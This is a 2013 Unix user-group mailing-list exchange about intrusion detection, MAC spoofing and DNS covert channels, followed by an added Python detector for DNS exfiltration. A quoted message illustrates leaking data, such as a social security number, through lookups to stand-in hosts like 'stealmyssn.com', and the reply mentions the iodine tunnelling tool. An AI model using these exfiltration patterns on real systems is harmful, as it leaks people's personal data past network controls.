[Tfug] Lightweight IDS options/strategy/policy

Yan zardus at gmail.com
Thu Sep 26 01:18:33 MST 2013


Out of curiosity, if you use MAC addresses for access control in your
network (unless that was a simplified example), how do you prevent MAC
spoofing on your networks? I'd imagine you'd have to go with something like
802.1x, at least.

On a slightly different topic: the DNS communication method you
demonstrated is quite realistic, aside from being a good example of a
covert channel. There's a cool tool called iodine (
http://code.kryo.se/iodine/) that uses the technique to create an
IP-over-DNS tunnel. Its intended use is punching through WiFi paywalls.
Just figured I'd toss it out there in case someone was unaware of it and
interested.


On Wed, Sep 25, 2013 at 4:28 PM, Bexley Hall <bexley401 at yahoo.com> wrote:

> Hi Kramer,
>
>
> On 9/25/2013 3:57 PM, Kramer Lee wrote:
>
>> "appears to only be "reading" from the outside world"
>>
>> Well, it depends on what they are reading.
>>
>> Probably the good info they get will be sent out encrypted.  If you
>> have some NSA grade encryption busters, you can see what it is and
>> maybe stop it.  If they have some NSA grade back-doors etc, they might
>> be able to get whatever they want.
>>
>
> nslookup(123771665.stealmyssn.com)
>
> I.e., if you let an app *look* at something, you have to assume
> that it *can* pass that information to a third party despite
> any firewalls, etc. that you put in place.
>
> E.g., install a "weather reporting" app and the above could be passed
> resolving http://www.weatherthief.com/currentweather/123771665.html
>
> If the system runs 24/7/365 then it can covertly pass a *boatload*
> of information without raising any eyebrows!
>
>
> _______________________________________________
> Tucson Free Unix Group - tfug at tfug.org
> Subscription Options:
> http://www.tfug.org/mailman/listinfo/tfug_tfug.org
>
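
A defender-side illustration of the DNS channel discussed in this thread, added here and not part of the original messages: it groups resolver queries by client and parent zone and flags zones that receive many distinct, data-like subdomain labels. The log entries other than the `123771665.stealmyssn.com` name quoted above are constructed, and the thresholds and the two-label zone split are assumptions.

```python
import math
from collections import Counter, defaultdict

def entropy(s):
    """Shannon entropy of s in bits per character."""
    return -sum(n / len(s) * math.log2(n / len(s)) for n in Counter(s).values())

def split_zone(qname):
    """Naive split into (zone, subdomain): the zone is the last two labels.
    Assumption for brevity; production code should use the Public Suffix List."""
    labels = qname.rstrip(".").lower().split(".")
    return ".".join(labels[-2:]), ".".join(labels[:-2])

def suspicious_zones(queries, min_unique=4, min_chars=30, min_entropy=3.0):
    """Flag (client, zone) pairs that receive many distinct, data-like subdomains.
    Thresholds are illustrative assumptions, not tuned values."""
    subs = defaultdict(set)
    for client, qname in queries:
        zone, sub = split_zone(qname)
        if sub:  # ignore queries for the bare zone itself
            subs[(client, zone)].add(sub)
    report = {}
    for key, names in subs.items():
        chars = sum(len(n) for n in names)  # rough size of data carried in labels
        data_like = [n for n in names
                     if n.replace(".", "").isdigit() or entropy(n) > min_entropy]
        if (len(names) >= min_unique and chars >= min_chars
                and len(data_like) >= 0.75 * len(names)):
            report[key] = {"unique": len(names), "payload_chars": chars}
    return report

# Constructed resolver log: (client IP, queried name).
SAMPLE = [
    ("10.0.0.5", "123771665.stealmyssn.com"),  # name quoted in the thread
    ("10.0.0.5", "558102934.stealmyssn.com"),
    ("10.0.0.5", "907346120.stealmyssn.com"),
    ("10.0.0.5", "441900276.stealmyssn.com"),
    ("10.0.0.5", "www.example.com"),
    ("10.0.0.7", "www.example.com"),
    ("10.0.0.7", "mail.example.com"),
    ("10.0.0.7", "img1.example.net"),
    ("10.0.0.7", "static.example.net"),
]

if __name__ == "__main__":
    for (client, zone), stats in suspicious_zones(SAMPLE).items():
        print(client, zone, stats)
```

Counting distinct labels per zone over a long window matters here because, as noted in the quoted message, each individual lookup looks unremarkable on its own.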

